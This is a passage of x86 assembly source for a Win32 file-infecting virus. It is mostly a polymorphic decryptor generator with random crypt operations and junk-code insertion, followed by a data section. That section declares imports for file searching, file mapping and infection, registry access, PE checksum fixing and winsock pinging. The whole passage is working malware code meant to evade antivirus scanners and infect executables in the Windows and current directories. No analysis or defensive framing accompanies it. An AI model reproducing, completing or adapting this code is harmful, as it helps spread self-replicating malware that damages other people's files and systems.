add eax, edx
|
||
|
add eax, edi
|
||
|
add eax, ebp
|
||
|
add eax, dword ptr [ebp+PolyLen]
|
||
|
add eax, dword ptr [ebp+LoopLen]
|
||
|
|
||
|
sub eax, esi
|
||
|
sub eax, ebx
|
||
|
|
||
|
pop ecx
|
||
|
add eax, ecx
|
||
|
|
||
|
add al, byte ptr [ebp+Reg1]
|
||
|
add ah, byte ptr [ebp+Reg2]
|
||
|
|
||
|
or eax, eax
|
||
|
jne GetOutRand
|
||
|
mov eax, 87654321h
|
||
|
inc eax
|
||
|
|
||
|
GetOutRand:
|
||
|
xor edx, edx ; clean edx ( needed to be able to divide later )
|
||
|
div ecx ; Random Numer is in EAX
|
||
|
; RND No. 'till ECX in EDX
|
||
|
ret
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; ----------------------[ Generate a Poly Decryptor ]------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
genPoly:
|
||
|
and dword ptr [ebp+PolyLen], 0h
|
||
|
|
||
|
push 10h
|
||
|
pop ecx
|
||
|
call GetRand ; get a random number to start
|
||
|
; and save it as the new key used for all files
|
||
|
|
||
|
mov byte ptr [ebp+PolyKey], al
|
||
|
|
||
|
call GetRegs
|
||
|
|
||
|
lea edi, [ebp+PDecrypt] ; here starts the decryptor
|
||
|
|
||
|
call RandJunk
|
||
|
; we have 3 different ways to put
|
||
|
; the size in ecx and 3 different ways
|
||
|
; to get the starting offset in esi
|
||
|
push 2h ; divide by 2
|
||
|
pop ecx
|
||
|
call GetRand ; get a random number to decide what we do
|
||
|
; first
|
||
|
; we need these 2 values before we start the
|
||
|
; decryption loop !
|
||
|
|
||
|
; if edx = 1 we use the second one
|
||
|
dec edx ; chose the Order
|
||
|
jz SecondOrder
|
||
|
FirstOrder:
|
||
|
call GenerateESI ; esi comes first and ecx follows
|
||
|
call RandJunk
|
||
|
call GenerateECX ; and 4 different ways to get size in exc
|
||
|
jmp Polypreparefinished ; so there is nothing static here !
|
||
|
|
||
|
SecondOrder: ; ecx comes first and esi follows
|
||
|
call GenerateECX
|
||
|
call RandJunk
|
||
|
call GenerateESI
|
||
|
|
||
|
Polypreparefinished: ; we finished the preparing and can start the loop
|
||
|
; we need a
|
||
|
; xor byte ptr [esi], key ( or other crypto )
|
||
|
; inc esi / add esi, 1h
|
||
|
; loop Decryptor / dec ecx , jnz Above ..
|
||
|
|
||
|
; lenght of loop = 0
|
||
|
and dword ptr [ebp+LoopLen], 0
|
||
|
; now we choose the way we crypt this thing !
|
||
|
|
||
|
push 5h
|
||
|
pop ecx
|
||
|
call GetRand
|
||
|
mov dword ptr [ebp+CryptType], edx
|
||
|
|
||
|
XorDecrypt: ; we use a simple XOR BYTE PTR [ESI], KEY
|
||
|
dec edx
|
||
|
jnz NegDecrypt
|
||
|
|
||
|
mov ax, 3680h ; xor byte ptr [esi]
|
||
|
stosw
|
||
|
|
||
|
mov al, byte ptr [ebp+PolyKey]
|
||
|
stosb
|
||
|
; increase sizes ( we will add the last 2 bytes later )
|
||
|
add dword ptr [ebp+LoopLen], 1h
|
||
|
add dword ptr [ebp+PolyLen], 1h
|
||
|
|
||
|
jmp EndPolyCrypto
|
||
|
|
||
|
NegDecrypt: ; neg byte ptr [esi]
|
||
|
dec edx
|
||
|
jnz NotDecrypt
|
||
|
mov ax, 1EF6h
|
||
|
stosw
|
||
|
jmp EndPolyCrypto
|
||
|
|
||
|
NotDecrypt: ; not byte ptr [esi]
|
||
|
dec edx
|
||
|
jnz IncDecrypt
|
||
|
mov ax, 16F6h
|
||
|
stosw
|
||
|
jmp EndPolyCrypto
|
||
|
|
||
|
IncDecrypt: ; inc byte ptr [esi]
|
||
|
dec edx
|
||
|
jnz DecDecrypt
|
||
|
mov ax, 06FEh
|
||
|
stosw
|
||
|
jmp EndPolyCrypto
|
||
|
|
||
|
DecDecrypt: ; dec byte ptr [esi]
|
||
|
mov ax, 0EFEh
|
||
|
stosw
|
||
|
|
||
|
|
||
|
EndPolyCrypto: ; add the last 2 bytes
|
||
|
add dword ptr [ebp+LoopLen], 2h
|
||
|
add dword ptr [ebp+PolyLen], 2h
|
||
|
|
||
|
call RandJunk ; more junk.. ;)
|
||
|
|
||
|
; now we need to increase esi
|
||
|
; to crypt the next byte
|
||
|
push 3h
|
||
|
pop ecx
|
||
|
call GetRand
|
||
|
|
||
|
IncESI1:
|
||
|
dec edx
|
||
|
jnz IncESI2
|
||
|
|
||
|
mov al, 46h ; do a simple inc esi
|
||
|
stosb
|
||
|
|
||
|
jmp EndIncESI
|
||
|
|
||
|
IncESI2: ; add esi, 1h
|
||
|
dec edx
|
||
|
jnz IncESI3
|
||
|
|
||
|
mov al, 83h
|
||
|
stosb
|
||
|
mov ax, 01C6h
|
||
|
stosw
|
||
|
|
||
|
jmp EndIncESI2
|
||
|
|
||
|
IncESI3: ; clc, adc esi, 1h
|
||
|
|
||
|
mov eax, 01d683f8h
|
||
|
stosd
|
||
|
|
||
|
add dword ptr [ebp+LoopLen], 1h
|
||
|
add dword ptr [ebp+PolyLen], 1h
|
||
|
|
||
|
EndIncESI2:
|
||
|
add dword ptr [ebp+LoopLen], 2h
|
||
|
add dword ptr [ebp+PolyLen], 2h
|
||
|
|
||
|
EndIncESI:
|
||
|
add dword ptr [ebp+LoopLen], 1h
|
||
|
add dword ptr [ebp+PolyLen], 1h
|
||
|
|
||
|
call RandJunk ; more, and more..
|
||
|
|
||
|
; now esi is incremented and we just have to do
|
||
|
; the loop
|
||
|
push 3h
|
||
|
pop ecx
|
||
|
call GetRand
|
||
|
LoopType1: ; we use the most common form : loop ;)
|
||
|
dec edx
|
||
|
jnz LoopType2
|
||
|
|
||
|
mov al, 0e2h
|
||
|
stosb
|
||
|
|
||
|
call StoreLoopLen
|
||
|
|
||
|
jmp EndLoopType
|
||
|
|
||
|
LoopType2: ; we do a dec ecx, jnz
|
||
|
dec edx
|
||
|
jnz LoopType3
|
||
|
|
||
|
mov ax, 7549h
|
||
|
stosw ; correct Loop Size ( dec ecx = 1 byte )
|
||
|
add dword ptr [ebp+LoopLen], 1h
|
||
|
call StoreLoopLen
|
||
|
|
||
|
add dword ptr [ebp+PolyLen], 1h
|
||
|
|
||
|
jmp EndLoopType
|
||
|
|
||
|
LoopType3:
|
||
|
mov eax, 0F98349h ; dec ecx cmp ecx, 0h
|
||
|
stosd
|
||
|
add dword ptr [ebp+LoopLen], 4h
|
||
|
mov al, 75h ; jne
|
||
|
stosb
|
||
|
add dword ptr [ebp+PolyLen], 3h
|
||
|
call StoreLoopLen
|
||
|
|
||
|
EndLoopType:
|
||
|
add dword ptr [ebp+PolyLen], 2h
|
||
|
|
||
|
mov byte ptr [edi], 0C3h ; save the ending ret
|
||
|
add dword ptr [ebp+PolyLen], 2h
|
||
|
|
||
|
|
||
|
mov eax, VirusSize ; calculate the new size for the virus
|
||
|
add eax, dword ptr [ebp+PolyLen]
|
||
|
mov dword ptr [ebp+VirLen], eax
|
||
|
|
||
|
ret
|
||
|
|
||
|
StoreLoopLen:
|
||
|
xor eax, eax ; calculate the size for the loop
|
||
|
mov ax, 100h
|
||
|
sub eax, dword ptr [ebp+LoopLen]
|
||
|
sub eax, 2h
|
||
|
stosb
|
||
|
ret
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; --------------------------[ Insert Junk Code ]----------------------------
|
||
|
; ***************************************************************************
|
||
|
RandJunk: ; edi points to the place where they will be stored
|
||
|
; we will insert 1-8 junk instructions
|
||
|
push 7d ; each time this routine is called
|
||
|
pop ecx
|
||
|
call GetRand
|
||
|
xchg ecx, edx
|
||
|
inc ecx
|
||
|
|
||
|
push ecx
|
||
|
|
||
|
|
||
|
RandJunkLoop:
|
||
|
push ecx
|
||
|
|
||
|
push 8h
|
||
|
pop ecx
|
||
|
call GetRand ; get a random number from 0 to 7
|
||
|
xchg eax, edx
|
||
|
|
||
|
lea ebx, [ebp+OpcodeTable]
|
||
|
xlat ; get the choosen opcode
|
||
|
stosb ; and save it to edi
|
||
|
xor eax, eax ; clean eax
|
||
|
; get first Register
|
||
|
mov al, byte ptr [ebp+Reg1]
|
||
|
shl eax, 3h ; multiply with 8
|
||
|
add eax, 0c0h ; add base
|
||
|
; add the second register
|
||
|
add al, byte ptr [ebp+Reg2]
|
||
|
stosb ; save opcode
|
||
|
|
||
|
XchangeRegs: ; we get new ones and exchange them
|
||
|
Call GetRegs ; cause the rnd - generator relies on them *g*
|
||
|
mov al, byte ptr [ebp+Reg1]
|
||
|
mov ah, byte ptr [ebp+Reg2]
|
||
|
mov byte ptr [ebp+Reg1], ah
|
||
|
mov byte ptr [ebp+Reg2], al
|
||
|
|
||
|
|
||
|
pop ecx ; restore ecx
|
||
|
loop RandJunkLoop ; and loop
|
||
|
|
||
|
pop ecx ; we need the additional lenght
|
||
|
shl ecx, 1 ; multiply with 2
|
||
|
; save it
|
||
|
add dword ptr [ebp+LoopLen], ecx
|
||
|
add dword ptr [ebp+PolyLen], ecx
|
||
|
|
||
|
|
||
|
ret
|
||
|
|
||
|
OpcodeTable:
|
||
|
db 08Bh ; mov
|
||
|
db 033h ; xor
|
||
|
db 00Bh ; or
|
||
|
db 02Bh ; sub
|
||
|
db 003h ; add
|
||
|
db 023h ; and
|
||
|
db 013h ; adc
|
||
|
db 01Bh ; sbb
|
||
|
|
||
|
|
||
|
GetRegs: ; select two registers to use
|
||
|
; set to Error
|
||
|
pushad
|
||
|
mov byte ptr [ebp+Reg1], -1
|
||
|
mov byte ptr [ebp+Reg2], -1
|
||
|
|
||
|
lea edi, [ebp+Reg1]
|
||
|
mov ecx, 2
|
||
|
; now we choose 2 registers we use
|
||
|
|
||
|
NextReg: ; to make the junk code look realistic
|
||
|
push ecx
|
||
|
push 8h
|
||
|
pop ecx
|
||
|
call GetRand
|
||
|
pop ecx
|
||
|
|
||
|
cmp edx, 1h ; we will not use ECX
|
||
|
je NextReg
|
||
|
cmp edx, 4h ; ESP
|
||
|
je NextReg
|
||
|
cmp edx, 6h ; or ESI, cause these values are important
|
||
|
je NextReg ; for the decryptor or the virus to work.
|
||
|
mov al, dl ; save it
|
||
|
stosb
|
||
|
loop NextReg
|
||
|
|
||
|
popad
|
||
|
ret
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -------------------------[ Get esi from stack ]----------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
GenerateESI:
|
||
|
; the first thing we do is to get the
|
||
|
; start of the crypted code, this is simpel,
|
||
|
; it is our return address, so we get it from
|
||
|
; stack
|
||
|
; there are 3 different ways we can do this
|
||
|
push 3h
|
||
|
pop ecx
|
||
|
call GetRand
|
||
|
dec edx ; which way to we use ?
|
||
|
|
||
|
jnz ESI2
|
||
|
|
||
|
ESI1:
|
||
|
lea esi, [ebp+movESI] ; use the mov esi, [esp] instruction
|
||
|
movsw ; 3 bytes long
|
||
|
movsb
|
||
|
add dword ptr [ebp+PolyLen], 3h
|
||
|
|
||
|
jmp EndESI ; get back
|
||
|
|
||
|
|
||
|
ESI2: ; we simply pop esi and push it again
|
||
|
dec edx
|
||
|
jnz ESI3
|
||
|
|
||
|
mov al, 5eh ; pop esi
|
||
|
stosb
|
||
|
mov al, 56h
|
||
|
stosb ; push esi
|
||
|
add dword ptr [ebp+PolyLen],2h
|
||
|
jmp EndESI
|
||
|
|
||
|
|
||
|
ESI3:
|
||
|
push 5h
|
||
|
pop ecx
|
||
|
call GetRand
|
||
|
xchg eax, edx
|
||
|
cmp al, 1h ; if we got ecx, we use eax
|
||
|
jne ESI3b
|
||
|
xor eax, eax
|
||
|
|
||
|
ESI3b:
|
||
|
mov edx, eax
|
||
|
push edx ; save edx
|
||
|
add eax, 58h ; pop a register
|
||
|
|
||
|
stosb
|
||
|
|
||
|
pop eax ; push the value again
|
||
|
push eax
|
||
|
add eax, 50h
|
||
|
stosb
|
||
|
|
||
|
mov al, 08bh ; and finally move it to esi
|
||
|
stosb
|
||
|
pop eax
|
||
|
mov al, 0f0h
|
||
|
add al, dl
|
||
|
stosb
|
||
|
add dword ptr [ebp+PolyLen], 4h
|
||
|
|
||
|
EndESI:
|
||
|
ret
|
||
|
|
||
|
; code to retrieve the start of crypt-code
|
||
|
movESI db 8bh, 34h, 24h ; mov esi, [esp]
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; --------------------------[ Move the size to ECX ]-------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
GenerateECX: ; here we put the size of the crypted
|
||
|
; part in ecx
|
||
|
|
||
|
push 3h
|
||
|
pop ecx
|
||
|
call GetRand ; random Nr in edx
|
||
|
inc edx ; increase
|
||
|
|
||
|
ECX1: ; use a simple mov
|
||
|
dec edx
|
||
|
jnz ECX2
|
||
|
|
||
|
mov al, 0b9h ; mov
|
||
|
call StoreALValue
|
||
|
|
||
|
jmp EndECX
|
||
|
|
||
|
ECX2: ; let's use a push ( value )
|
||
|
dec edx ; pop ecx
|
||
|
jnz ECX3
|
||
|
|
||
|
mov al, 068h ; push
|
||
|
call StoreALValue
|
||
|
|
||
|
mov al, 59h ; save the pop ecx
|
||
|
stosb
|
||
|
add dword ptr [ebp+PolyLen], 1h
|
||
|
|
||
|
jmp EndECX
|
||
|
|
||
|
ECX3:
|
||
|
push -1
|
||
|
pop ecx
|
||
|
call GetRand
|
||
|
mov eax, VirusSize
|
||
|
shl edx, 26d
|
||
|
shr edx, 26d
|
||
|
sub eax, edx
|
||
|
|
||
|
push eax ; mov ecx, Size - X
|
||
|
mov al, 0b9h
|
||
|
stosb ; and the size we need to decrypt
|
||
|
pop eax
|
||
|
stosb
|
||
|
call StoShrEAX
|
||
|
|
||
|
mov ax, 0c181h ; add ecx, X
|
||
|
stosw
|
||
|
xor eax, eax
|
||
|
mov al, dl
|
||
|
|
||
|
stosb
|
||
|
call StoShrEAX
|
||
|
add dword ptr [ebp+PolyLen], 11d
|
||
|
|
||
|
jmp EndECX ; finish
|
||
|
|
||
|
|
||
|
StoreECX: ; save the mov
|
||
|
push ax ; save the register
|
||
|
|
||
|
mov al, 0b8h ; save the mov reg, size
|
||
|
add al, dl
|
||
|
call StoreALValue
|
||
|
|
||
|
mov al, 03h ; add ecx, reg
|
||
|
stosb
|
||
|
pop ax ; get the chosen register
|
||
|
add al, 0c8h
|
||
|
stosb
|
||
|
|
||
|
add dword ptr [ebp+PolyLen], 4h
|
||
|
|
||
|
EndECX: ; let's return
|
||
|
ret
|
||
|
|
||
|
|
||
|
StoShrEAX: ; to save dwords backwards
|
||
|
push 3
|
||
|
pop ecx
|
||
|
StoShrEAXLoop:
|
||
|
shr eax, 8
|
||
|
stosb
|
||
|
loop StoShrEAXLoop
|
||
|
ret
|
||
|
|
||
|
|
||
|
StoreALValue: ; we store the instruction in al
|
||
|
stosb ; and the size we need to decrypt
|
||
|
mov eax, FirstLSize ; eax, size
|
||
|
stosb
|
||
|
call StoShrEAX
|
||
|
|
||
|
add dword ptr [ebp+PolyLen], 5h
|
||
|
add dword ptr [ebp+LoopLen], 5h
|
||
|
ret
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -------------------[ Data which does not travel ]--------------------------
|
||
|
; ***************************************************************************
|
||
|
VirusEnd: ; ok, this data will travel, but will be generated
|
||
|
; new on each run
|
||
|
|
||
|
PDecrypt: ; here will we add the polymorphic
|
||
|
; decryption routine later, but not included
|
||
|
; into 1.st generation
|
||
|
ret ; so we just return
|
||
|
|
||
|
db 150d dup (0h) ; we keep 150 bytes free, so we have a buffer
|
||
|
; for the poly decryptor
|
||
|
|
||
|
|
||
|
|
||
|
; here we save the data which does not
|
||
|
; travel which each copy of the virus
|
||
|
|
||
|
PolyKey db (?) ; key for the poly decryptor
|
||
|
PolyLen dd (?) ; lenght of decryptor
|
||
|
VirLen dd (?) ; virus lenght + decryptor
|
||
|
LoopLen dd (?) ; lenght of the decryption loop
|
||
|
CryptType dd (?) ; we save which kind of encryption we use
|
||
|
|
||
|
Reg1 db (?) ; here we save the registers we use for the junk
|
||
|
Reg2 db (?) ; code
|
||
|
|
||
|
SEH_Save dd (?) ; We save the original SEH
|
||
|
|
||
|
; Handles of the dll's we use
|
||
|
K32Handle dd (?) ; Kernel32.dll might be nessecairy *g*
|
||
|
IHLHandle dd (?) ; Imagehlp.dll to create checksums
|
||
|
ADVHandle dd (?) ; Advapi32.dll for registry access
|
||
|
W32Handle dd (?) ; Winsck32.dll for pinging
|
||
|
|
||
|
; The Offsets of the API's we use
|
||
|
XLoadLibraryA dd (?) ; Here we save their Offset
|
||
|
XGetProcAddress dd (?)
|
||
|
|
||
|
XFindFirstFileA dd (?)
|
||
|
XFindNextFileA dd (?)
|
||
|
XFindClose dd (?)
|
||
|
XCreateFileA dd (?)
|
||
|
XSetFileAttributesA dd (?)
|
||
|
XCloseHandle dd (?)
|
||
|
XCreateFileMappingA dd (?)
|
||
|
XMapViewOfFile dd (?)
|
||
|
XUnmapViewOfFile dd (?)
|
||
|
XGetWindowsDirectoryA dd (?)
|
||
|
XGetSystemDirectoryA dd (?)
|
||
|
XGetCurrentDirectoryA dd (?)
|
||
|
XSetCurrentDirectoryA dd (?)
|
||
|
XGetFileAttributesA dd (?)
|
||
|
XGetTickCount dd (?)
|
||
|
XCreateThread dd (?)
|
||
|
XGetSystemTime dd (?)
|
||
|
|
||
|
XCheckSumMappedFile dd (?)
|
||
|
|
||
|
|
||
|
XRegOpenKeyExA dd (?)
|
||
|
XRegQueryValueExA dd (?)
|
||
|
XRegCloseKey dd (?)
|
||
|
|
||
|
Xsocket dd (?)
|
||
|
XWSACleanup dd (?)
|
||
|
XWSAStartup dd (?)
|
||
|
Xclosesocket dd (?)
|
||
|
Xsendto dd (?)
|
||
|
Xsetsockopt dd (?)
|
||
|
|
||
|
; Data to search Kernel
|
||
|
KernelAddy dd (?) ; Pointer to kernel PE-Header
|
||
|
MZAddy dd (?) ; Pointer to kernel MZ-Header
|
||
|
|
||
|
RegHandle dd (?) ; Handle to open Reg-Key
|
||
|
|
||
|
; Directory's
|
||
|
windir db 7Fh dup (0) ; here we save the directory's
|
||
|
curdir db 7Fh dup (0) ; we want to infect
|
||
|
|
||
|
; some data for infection
|
||
|
counter dw (?) ; a counter to know how many names we have compared
|
||
|
ATableVA dd (?) ; the Address Table VA
|
||
|
NTableVA dd (?) ; the Name Pointer Table VA
|
||
|
OTableVA dd (?) ; the Name Pointer Table VA
|
||
|
|
||
|
NewSize dd (?) ; we save the new size of the file here
|
||
|
CheckSum dd (?) ; checksum
|
||
|
HeaderSum dd (?) ; crc of header
|
||
|
|
||
|
; Data to find files
|
||
|
|
||
|
WIN32_FIND_DATA label byte
|
||
|
WFD_dwFileAttributes dd ?
|
||
|
WFD_ftCreationTime FILETIME ?
|
||
|
WFD_ftLastAccessTime FILETIME ?
|
||
|
WFD_ftLastWriteTime FILETIME ?
|
||
|
WFD_nFileSizeHigh dd ?
|
||
|
WFD_nFileSizeLow dd ?
|
||
|
WFD_dwReserved0 dd ?
|
||
|
WFD_dwReserved1 dd ?
|
||
|
WFD_szFileName db 260d dup (?)
|
||
|
WFD_szAlternateFileName db 13 dup (?)
|
||
|
WFD_szAlternateEnding db 03 dup (?)
|
||
|
|
||
|
FileHandle dd (?) ; handle of file
|
||
|
MapHandle dd (?) ; Handle of Map
|
||
|
MapAddress dd (?) ; offset of Map
|
||
|
|
||
|
Attributes dd (?) ; saved File-Attributes
|
||
|
threadID dd (?) ; payload runs in an extra thread
|
||
|
; we need this buffer for follwing
|
||
|
; the shortcuts
|
||
|
Buffer db 337d dup (?)
|
||
|
; this buffer is nessecairy
|
||
|
; to create a winsock connection ( ping )
|
||
|
WSA_DATA db 400d dup (0)
|
||
|
|
||
|
SystemTime: ; needed to get the current day
|
||
|
wYear dw (?)
|
||
|
wMonth dw (?)
|
||
|
wDayOfWeek dw (?) ; Sunday = 0, Monday = 1 .. etc.
|
||
|
wDay dw (?)
|
||
|
wHour dw (?)
|
||
|
wMinute dw (?)
|
||
|
wSecond dw (?)
|
||
|
wMilliseconds dw (?)
|
||
|
|
||
|
|
||
|
EndBufferData:
|
||
|
; ***************************************************************************
|
||
|
; ------------------------[ That's all folks ]-------------------------------
|
||
|
; ***************************************************************************
|
||
|
end Virus
|